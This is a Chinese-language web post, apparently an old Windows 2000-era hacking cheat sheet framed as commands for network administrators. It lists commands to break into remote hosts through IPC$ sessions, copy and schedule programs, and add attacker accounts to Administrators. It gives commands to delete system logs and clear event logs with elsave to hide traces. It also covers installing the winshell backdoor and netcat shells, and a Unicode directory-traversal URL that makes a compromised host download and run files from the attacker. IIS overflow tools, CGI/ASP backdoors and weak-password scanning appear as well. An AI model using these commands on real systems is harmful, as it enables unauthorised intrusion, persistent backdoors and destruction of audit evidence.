網絡管理員和***都應知道的幾條命令

常用的幾?a href="javascript:;" onClick="javascript:tagshow(event, '%F5NET');" target="_self">鮊ET命令: 
  (與遠程主機建立空管連接) net use file://IP/地址\ipc$ "" /use:"" 
  (以管理員身份登錄遠程主機) net use file://IP/地址\ipc$ "密碼" /use:"Administrator" 
  (傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 file://IP/地址\admin$ 
  (查看遠程主機時間) net time file://IP/地址 
  (定時啓動某個程序) at file://IP/地址 02:18 readme.exe 
  (查看共享) net view file://IP/地址 
  (查看netbios工作組列表) nbtstat -A IP地址 
  (將遠程主機C盤映射爲自己的F盤) net use f: file://IP/地址\c$ ""/user:"Administrator" 
  (這兩條把自己增加到管理員組): net user 用戶名 密碼 /add 
  net localgroup Administrators 用戶名 /add 
  (斷開連接) net use file://IP/地址\ipc$ /delete 
  掃尾: 
  del C:\winnt\system32\logfiles\*.* 
  del C:\winnt\ssytem32\config\*.evt 
  del C:\winnt\system32\dtclog\*.* 
  del C:\winnt\system32\*.log 
  del C:\winnt\system32\*.txt 
  del C:\winnt\*.txt 
  del C:\winnt\*.log 
  一、netsvc.exe 
  下面的命令分別是列出主機上的服務項目、查尋和遠程啓動主機的“時間任務”服務: 
  netsvc /list file://IP/地址 
  netsvc schedule file://IP/地址 /query 
  netsvc file://IP/地址 schedule /start 
  二、OpenTelnet.exe 
  遠程啓動主機的Telnet服務,並綁定端口到7878,例如: 
  OpenTelnet file://IP/地址 用戶名 密碼 1 7878 
  然後就可以telnet到主機的7878端口,進入DOS方式下: 
  telnet IP地址 7878 三、winshell.exe 
  一個非常小的***(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>後,可打下面的命令: 
  p Path (查看winshell主程序的路徑信息) 
  b reBoot (重新啓動機器) 
  d shutDown (關閉機器) 
  s Shell (執行後你就會看到可愛的“C:\>”) 
  x eXit (退出本次登錄會話,此命令並不終止winshell的運行) 
  CMD> [url]http://.../srv.exe [/url](通過http下載其他網站上的文件到運行winshell的機器上) 
  四、3389登陸器,GUI方式登錄遠程主機的 
  五、elsave.exe 
  事件日誌清除工具 
  elsave -s file://IP/地址 -l "application" -C 
  elsave -s file://IP/地址 -l "system" -C 
  elsave -s file://IP/地址 -l "security" -C 
  執行後成功清除應用程序日誌,系統日誌,安全日誌 
  六、hbulot.exe 
  開啓win2kserver和winxp的3389服務 
  hbulot [/r] 
  使用/r表示安裝完成後自動重起目標使設置生效。 
  七、nc.exe(netcat.exe) 
  一個很好的工具,一些腳本程序都要用到它,也可做溢出後的連接用。 
  想要連接到某處: nc [-options] hostname port[s] [ports] ... 
  綁定端口等待連接: nc -l -p port [-options] [hostname] [port] 
  參數: 
  -e prog 程序重定向,一旦連接,就執行 [危險!!] 
  -g gateway source-routing hop point[s], up to 8 
  -G num source-routing pointer: 4, 8, 12, ... 
  -h 幫助信息 
  -i secs 延時的間隔 
  -l 監聽模式,用於入站連接 
  -n 指定數字的IP地址,不能用hostname 
  -o file 記錄16進制的傳輸 
  -p port 本地端口號 
  -r 任意指定本地及遠程端口 
  -s addr 本地源地址 
  -u UDP模式 
  -v 詳細輸出——用兩個-v可得到更詳細的內容 
  -w secs timeout的時間 
  -z 將輸入輸出關掉——用於掃描時 八、TFTPD32.EXE 
  把自己的電腦臨時變爲一臺FTP服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如: 
  [url]http://ip/[/url]地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名 
  然後可以直接令文件運行: 
  [url]http://ip/[/url]地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 九、prihack.exe是IIS的printer遠程緩衝區溢出工具。 
  idqover.exe是溢出idq的,選擇“溢出後在一個端口監聽”,然後用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以後winxp下需要打winxp。 
  一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然後用IE瀏覽器連接。 
一、Xscan命令行運行參數說明: 
在檢測過程中,按"[空格]"鍵可以查看各線程狀態及掃描進度,按"q"鍵保存當前數據後提前退出程序,按""強行關閉程序。 
1.命令格式: xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 
xscan -file <主機列表文件名> <檢測項目> [其他選項] 
其中<檢測項目> 含義如下: 
-port : 檢測常用服務的端口狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項定製待檢測端口列表); 
-ftp : 檢測FTP弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件); 
-ntpass : 檢測NT-Server弱口令(可通過\dat\config.ini文件設置用戶名/密碼字典文件); 
-cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案); 
-iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設置編碼方案); 
[其他選項] 含義如下: 
-v: 顯示詳細掃描進度 
-p: 跳過Ping不通的主機 
-o: 跳過沒有檢測到開放端口的主機 
-t <併發線程數量[,併發主機數量]>: 指定最大併發線程數量和併發主機數量, 默認數量爲100,10 
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章